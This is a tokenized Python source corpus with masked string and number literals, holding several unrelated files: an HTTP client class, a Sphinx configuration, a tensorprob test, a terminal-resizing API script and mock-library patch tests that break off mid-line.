<EOL> self . database_id = database_id <EOL> self . headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' % "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . auth = HTTPBasicAuth ( key , secret ) <EOL> self . pool = requests . session ( ) <EOL> for p in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> adapter = requests . adapters . HTTPAdapter ( ) <EOL> self . pool . mount ( p , adapter ) <EOL> def post ( self , url , body ) : <EOL> """<STR_LIT>""" <EOL> to_hit = urlparse . urljoin ( self . base_url , url ) <EOL> resp = self . pool . post ( to_hit , data = body , auth = self . auth ) <EOL> return resp <EOL> def get ( self , url ) : <EOL> """<STR_LIT>""" <EOL> to_hit = urlparse . urljoin ( self . base_url , url ) <EOL> resp = self . pool . get ( to_hit , auth = self . auth ) <EOL> return resp <EOL> def delete ( self , url ) : <EOL> """<STR_LIT>""" <EOL> to_hit = urlparse . urljoin ( self . base_url , url ) <EOL> resp = self . pool . delete ( to_hit , auth = self . auth ) <EOL> return resp <EOL> def put ( self , url , body ) : <EOL> """<STR_LIT>""" <EOL> to_hit = urlparse . urljoin ( self . base_url , url ) <EOL> resp = self . pool . put ( to_hit , data = body , auth = self . auth ) <EOL> return resp </s>
<s> import sys <EOL> import os <EOL> from recommonmark . parser import CommonMarkParser <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> source_parsers = { <EOL> '<STR_LIT>' : CommonMarkParser , <EOL> } <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> author = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> language = None <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> todo_include_todos = False <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ author ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> author , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import inspect <EOL> from os . path import relpath , dirname <EOL> import tensorprob <EOL> def linkcode_resolve ( domain , info ) : <EOL> """<STR_LIT>""" <EOL> if domain != '<STR_LIT>' : <EOL> return None <EOL> modname = info [ '<STR_LIT>' ] <EOL> fullname = info [ '<STR_LIT>' ] <EOL> submod = sys . modules . get ( modname ) <EOL> if submod is None : <EOL> return None <EOL> obj = submod <EOL> for part in fullname . split ( '<STR_LIT:.>' ) : <EOL> try : <EOL> obj = getattr ( obj , part ) <EOL> except : <EOL> return None <EOL> try : <EOL> inspect . getsourcefile ( obj ) <EOL> except : <EOL> return None <EOL> try : <EOL> fn = inspect . getsourcefile ( obj ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> return None <EOL> try : <EOL> source , lineno = inspect . findsource ( obj ) <EOL> except : <EOL> lineno = None <EOL> if lineno : <EOL> linespec = "<STR_LIT>" % ( lineno + <NUM_LIT:1> ) <EOL> else : <EOL> linespec = "<STR_LIT>" <EOL> fn = relpath ( fn , start = dirname ( tensorprob . __file__ ) ) <EOL> return "<STR_LIT>" % ( <EOL> fn , linespec ) </s>
<s> import numpy as np <EOL> import tensorprob as tp <EOL> import scipy . stats as st <EOL> from numpy . testing import assert_array_almost_equal , assert_array_equal <EOL> def make_normal ( ) : <EOL> mu = tp . Parameter ( name = '<STR_LIT>' ) <EOL> sigma = tp . Parameter ( name = '<STR_LIT>' , lower = <NUM_LIT:0> ) <EOL> X = tp . Normal ( mu , sigma ) <EOL> return mu , sigma , X <EOL> def test_pdf ( ) : <EOL> with tp . Model ( ) as m : <EOL> mu , sigma , X = make_normal ( ) <EOL> m . observed ( X ) <EOL> xs = np . linspace ( - <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:100> ) <EOL> out1 = st . norm . pdf ( xs , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> m . initialize ( { <EOL> mu : <NUM_LIT:0> , <EOL> sigma : <NUM_LIT:1> <EOL> } ) <EOL> out2 = m . pdf ( xs ) <EOL> assert_array_almost_equal ( out1 , out2 , <NUM_LIT:16> ) </s>
<s> import json <EOL> import urllib <EOL> import urllib2 <EOL> import argparse <EOL> def get_terminal_details ( user_token , access_token , subdomain ) : <EOL> output = json . loads ( urllib2 . urlopen ( '<STR_LIT>' , <EOL> urllib . urlencode ( { <EOL> '<STR_LIT>' : user_token , <EOL> '<STR_LIT>' : access_token , <EOL> '<STR_LIT>' : subdomain , <EOL> } ) ) . read ( ) ) <EOL> return output <EOL> def set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) : <EOL> output = json . loads ( urllib2 . urlopen ( '<STR_LIT>' , <EOL> urllib . urlencode ( { <EOL> '<STR_LIT>' : user_token , <EOL> '<STR_LIT>' : access_token , <EOL> '<STR_LIT>' : container_key , <EOL> '<STR_LIT>' : cpu , <EOL> '<STR_LIT>' : ram , <EOL> '<STR_LIT>' : diskspace , <EOL> } ) ) . read ( ) ) <EOL> return output <EOL> def get_new_size ( cpu_size , action ) : <EOL> cpu_index = <NUM_LIT:0> <EOL> terminals = [ { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:50> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:100> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:200> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } ] <EOL> for index in range ( <NUM_LIT:0> , len ( terminals ) ) : <EOL> if str ( int ( cpu_size ) ) == str ( terminals [ index ] [ '<STR_LIT>' ] ) : <EOL> cpu_index = index <EOL> if action == '<STR_LIT>' : <EOL> return terminals [ ( cpu_index + <NUM_LIT:1> ) ] [ '<STR_LIT>' ] , terminals [ ( cpu_index + <NUM_LIT:1> ) ] [ '<STR_LIT>' ] <EOL> elif action == '<STR_LIT>' : <EOL> return terminals [ ( cpu_index - <NUM_LIT:1> ) ] [ '<STR_LIT>' ] , terminals [ ( cpu_index - <NUM_LIT:1> ) ] [ '<STR_LIT>' ] <EOL> def get_credentials ( utoken , atoken , credsfile ) : <EOL> if utoken is None and atoken is None : <EOL> try : <EOL> creds = json . load ( open ( credsfile , '<STR_LIT:r>' ) ) <EOL> utoken = creds [ '<STR_LIT>' ] <EOL> atoken = creds [ '<STR_LIT>' ] <EOL> except : <EOL> print "<STR_LIT>" , "<STR_LIT>" <EOL> exit ( <NUM_LIT> ) <EOL> elif ( utoken is not None and atoken is None ) or ( utoken is None and atoken is not None ) : <EOL> print "<STR_LIT>" <EOL> exit ( <NUM_LIT:1> ) <EOL> else : <EOL> with open ( credsfile , '<STR_LIT:w>' ) as cfile : <EOL> json . dump ( { '<STR_LIT>' : utoken , '<STR_LIT>' : atoken } , cfile ) <EOL> return utoken , atoken <EOL> def upsize_terminal ( cpu_size ) : <EOL> print "<STR_LIT>" <EOL> cpu , ram = get_new_size ( cpu_size , '<STR_LIT>' ) <EOL> container_key = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> diskspace = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) <EOL> def downsize_terminal ( cpu_size ) : <EOL> print "<STR_LIT>" <EOL> cpu , ram = get_new_size ( cpu_size , '<STR_LIT>' ) <EOL> container_key = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> diskspace = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( "<STR_LIT:action>" , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT:50> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = None , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = None , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> subdomain = args . subdomain <EOL> user_token , access_token = get_credentials ( args . utoken , args . atoken , args . creds ) <EOL> if get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> cpu_size = float ( '<STR_LIT>' ) <EOL> else : <EOL> cpu_size = float ( get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if args . action == '<STR_LIT>' : <EOL> if cpu_size <= args . maxsize : <EOL> upsize_terminal ( cpu_size ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> elif args . action == '<STR_LIT>' : <EOL> if cpu_size >= args . minsize : <EOL> downsize_terminal ( cpu_size ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print '<STR_LIT>' <EOL> exit ( <NUM_LIT:1> ) </s>
<s> import os <EOL> import sys <EOL> import six <EOL> import unittest2 as unittest <EOL> from mock . tests import support <EOL> from mock . tests . support import SomeClass , is_instance , callable <EOL> from mock import ( <EOL> NonCallableMock , CallableMixin , patch , sentinel , <EOL> MagicMock , Mock , NonCallableMagicMock , patch , <EOL> DEFAULT , call <EOL> ) <EOL> from mock . mock import _patch , _get_target <EOL> builtin_string = '<STR_LIT>' <EOL> if six . PY3 : <EOL> builtin_string = '<STR_LIT>' <EOL> unicode = str <EOL> PTModule = sys . modules [ __name__ ] <EOL> MODNAME = '<STR_LIT>' % __name__ <EOL> def _get_proxy ( obj , get_only = True ) : <EOL> class Proxy ( object ) : <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( obj , name ) <EOL> if not get_only : <EOL> def __setattr__ ( self , name , value ) : <EOL> setattr ( obj , name , value ) <EOL> def __delattr__ ( self , name ) : <EOL> delattr ( obj , name ) <EOL> Proxy . __setattr__ = __setattr__ <EOL> Proxy . __delattr__ = __delattr__ <EOL> return Proxy ( ) <EOL> something = sentinel . Something <EOL> something_else = sentinel . SomethingElse <EOL> class Foo ( object ) : <EOL> def __init__ ( self , a ) : <EOL> pass <EOL> def f ( self , a ) : <EOL> pass <EOL> def g ( self ) : <EOL> pass <EOL> foo = '<STR_LIT:bar>' <EOL> class Bar ( object ) : <EOL> def a ( self ) : <EOL> pass <EOL> foo_name = '<STR_LIT>' % __name__ <EOL> def function ( a , b = Foo ) : <EOL> pass <EOL> class Container ( object ) : <EOL> def __init__ ( self ) : <EOL> self . values = { } <EOL> def __getitem__ ( self , name ) : <EOL> return self . values [ name ] <EOL> def __setitem__ ( self , name , value ) : <EOL> self . values [ name ] = value <EOL> def __delitem__ ( self , name ) : <EOL> del self . values [ name ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . values ) <EOL> class PatchTest ( unittest . TestCase ) : <EOL> def assertNotCallable ( self , obj , magic = True ) : <EOL> MockClass = NonCallableMagicMock <EOL> if not magic : <EOL> MockClass = NonCallableMock <EOL> self . assertRaises ( TypeError , obj ) <EOL> self . assertTrue ( is_instance ( obj , MockClass ) ) <EOL> self . assertFalse ( is_instance ( obj , CallableMixin ) ) <EOL> def test_single_patchobject ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_with_none ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> @ patch . object ( Something , '<STR_LIT>' , None ) <EOL> def test ( ) : <EOL> self . assertIsNone ( Something . attribute , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_multiple_patchobject ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> next_attribute = sentinel . Original2 <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched2 ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( Something . next_attribute , sentinel . Patched2 , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( Something . next_attribute , sentinel . Original2 , <EOL> "<STR_LIT>" ) <EOL> def test_object_lookup_is_quite_lazy ( self ) : <EOL> global something <EOL> original = something <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . Something2 ) <EOL> def test ( ) : <EOL> pass <EOL> try : <EOL> something = sentinel . replacement_value <EOL> test ( ) <EOL> self . assertEqual ( something , sentinel . replacement_value ) <EOL> finally : <EOL> something = original <EOL> def test_patch ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . Something2 ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something2 , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . Something2 ) <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . SomethingElse ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> mock = Mock ( ) <EOL> mock . return_value = sentinel . Handle <EOL> @ patch ( '<STR_LIT>' % builtin_string , mock ) <EOL> def test ( ) : <EOL> self . assertEqual ( open ( '<STR_LIT:filename>' , '<STR_LIT:r>' ) , sentinel . Handle , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> test ( ) <EOL> self . assertNotEqual ( open , mock , "<STR_LIT>" ) <EOL> def test_patch_class_attribute ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , <EOL> sentinel . ClassAttribute ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . SomeClass . class_attribute , <EOL> sentinel . ClassAttribute , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertIsNone ( PTModule . SomeClass . class_attribute , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_with_default_mock ( self ) : <EOL> class Test ( object ) : <EOL> something = sentinel . Original <EOL> something2 = sentinel . Original2 <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> def test ( mock ) : <EOL> self . assertEqual ( mock , Test . something , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock , MagicMock , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> def test ( this1 , this2 , mock1 , mock2 ) : <EOL> self . assertEqual ( this1 , sentinel . this1 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( this2 , sentinel . this2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( mock1 , Test . something2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( mock2 , Test . something , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock2 , MagicMock , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock2 , MagicMock , <EOL> "<STR_LIT>" ) <EOL> self . assertNotEqual ( outerMock1 , mock1 , "<STR_LIT>" ) <EOL> self . assertNotEqual ( outerMock2 , mock2 , "<STR_LIT>" ) <EOL> return mock1 , mock2 <EOL> outerMock1 = outerMock2 = None <EOL> outerMock1 , outerMock2 = test ( sentinel . this1 , sentinel . this2 ) <EOL> test ( sentinel . this1 , sentinel . this2 ) <EOL> def test_patch_with_spec ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = SomeClass ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patchobject_with_spec ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , spec = SomeClass ) <EOL> def test ( MockAttribute ) : <EOL> self . assertEqual ( SomeClass . class_attribute , MockAttribute ) <EOL> self . assertTrue ( is_instance ( SomeClass . class_attribute . wibble , <EOL> MagicMock ) ) <EOL> self . assertRaises ( AttributeError , <EOL> lambda : SomeClass . class_attribute . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_spec_as_list ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patchobject_with_spec_as_list ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockAttribute ) : <EOL> self . assertEqual ( SomeClass . class_attribute , MockAttribute ) <EOL> self . assertTrue ( is_instance ( SomeClass . class_attribute . wibble , <EOL> MagicMock ) ) <EOL> self . assertRaises ( AttributeError , <EOL> lambda : SomeClass . class_attribute . not_wibble ) <EOL> test ( ) <EOL> def test_nested_patch_with_spec_as_list ( self ) : <EOL> @ patch ( '<STR_LIT>' % builtin_string ) <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockSomeClass , MockOpen ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_spec_as_boolean ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> MockSomeClass . wibble <EOL> self . assertRaises ( AttributeError , lambda : MockSomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_object_with_spec_as_boolean ( self ) : <EOL> @ patch . object ( PTModule , '<STR_LIT>' , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> MockSomeClass . wibble <EOL> self . assertRaises ( AttributeError , lambda : MockSomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_class_acts_with_spec_is_inherited ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertTrue ( is_instance ( MockSomeClass , MagicMock ) ) <EOL> instance = MockSomeClass ( ) <EOL> self . assertNotCallable ( instance ) <EOL> instance . wibble <EOL> self . assertRaises ( AttributeError , lambda : instance . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_create_mocks_non_existent_attributes ( self ) : <EOL> @ patch ( '<STR_LIT>' % builtin_string , sentinel . Frooble , create = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> self . assertRaises ( NameError , lambda : frooble ) <EOL> def test_patchobject_with_create_mocks_non_existent_attributes ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , sentinel . Frooble , create = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( SomeClass . frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> self . assertFalse ( hasattr ( SomeClass , '<STR_LIT>' ) ) <EOL> def test_patch_wont_create_by_default ( self ) : <EOL> try : <EOL> @ patch ( '<STR_LIT>' % builtin_string , sentinel . Frooble ) <EOL> def test ( ) : <EOL> self . assertEqual ( frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertRaises ( NameError , lambda : frooble ) <EOL> def test_patchobject_wont_create_by_default ( self ) : <EOL> try : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , sentinel . Frooble ) <EOL> def test ( ) : <EOL> self . fail ( '<STR_LIT>' ) <EOL> test ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertFalse ( hasattr ( SomeClass , '<STR_LIT>' ) ) <EOL> def test_patch_builtins_without_create ( self ) : <EOL> @ patch ( __name__ + '<STR_LIT>' ) <EOL> def test_ord ( mock_ord ) : <EOL> mock_ord . return_value = <NUM_LIT> <EOL> return ord ( '<STR_LIT:c>' ) <EOL> @ patch ( __name__ + '<STR_LIT>' ) <EOL> def test_open ( mock_open ) : <EOL> m = mock_open . return_value <EOL> m . read . return_value = '<STR_LIT>' <EOL> fobj = open ( '<STR_LIT>' ) <EOL> data = fobj . read ( ) <EOL> fobj . close ( ) <EOL> return data <EOL> self . assertEqual ( test_ord ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( test_open ( ) , '<STR_LIT>' ) <EOL> def test_patch_with_static_methods ( self ) : <EOL> class Foo ( object ) : <EOL> @ staticmethod <EOL> def woot ( ) : <EOL> return sentinel . Static <EOL> @ patch . object ( Foo , '<STR_LIT>' , staticmethod ( lambda : sentinel . Patched ) ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( Foo . woot ( ) , sentinel . Patched ) <EOL> anonymous ( ) <EOL> self . assertEqual ( Foo . woot ( ) , sentinel . Static ) <EOL> def test_patch_local ( self ) : <EOL> foo = sentinel . Foo <EOL> @ patch . object ( sentinel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( sentinel . Foo , '<STR_LIT>' ) <EOL> anonymous ( ) <EOL> self . assertEqual ( sentinel . Foo , foo ) <EOL> def test_patch_slots ( self ) : <EOL> class Foo ( object ) : <EOL> __slots__ = ( '<STR_LIT>' , ) <EOL> foo = Foo ( ) <EOL> foo . Foo = sentinel . Foo <EOL> @ patch . object ( foo , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( foo . Foo , '<STR_LIT>' ) <EOL> anonymous ( ) <EOL> self . assertEqual ( foo . Foo , sentinel . Foo ) <EOL> def test_patchobject_class_decorator ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> class Foo ( object ) : <EOL> def test_method ( other_self ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , <EOL> "<STR_LIT>" ) <EOL> def not_test_method ( other_self ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> Foo = patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) ( Foo ) <EOL> f = Foo ( ) <EOL> f . test_method ( ) <EOL> f . not_test_method ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patch_class_decorator ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> class Foo ( object ) : <EOL> def test_method ( other_self , mock_something ) : <EOL> self . assertEqual ( PTModule . something , mock_something , <EOL> "<STR_LIT>" ) <EOL> def not_test_method ( other_self ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> Foo = patch ( '<STR_LIT>' % __name__ ) ( Foo ) <EOL> f = Foo ( ) <EOL> f . test_method ( ) <EOL> f . not_test_method ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_twice ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> next_attribute = sentinel . Original2 <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patch_dict ( self ) : <EOL> foo = { '<STR_LIT>' : object ( ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> original = foo . copy ( ) <EOL> @ patch . dict ( foo ) <EOL> def test ( ) : <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> del foo [ '<STR_LIT>' ] <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> def test_patch_dict_with_container_object ( self ) : <EOL> foo = Container ( ) <EOL> foo [ '<STR_LIT>' ] = object ( ) <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> original = foo . values . copy ( ) <EOL> @ patch . dict ( foo ) <EOL> def test ( ) : <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> del foo [ '<STR_LIT>' ] <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo . values ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> def test_patch_dict_with_clear ( self ) : <EOL> foo = { '<STR_LIT>' : object ( ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> original = foo . copy ( ) <EOL> @ patch . dict ( foo , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo , { } ) <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo 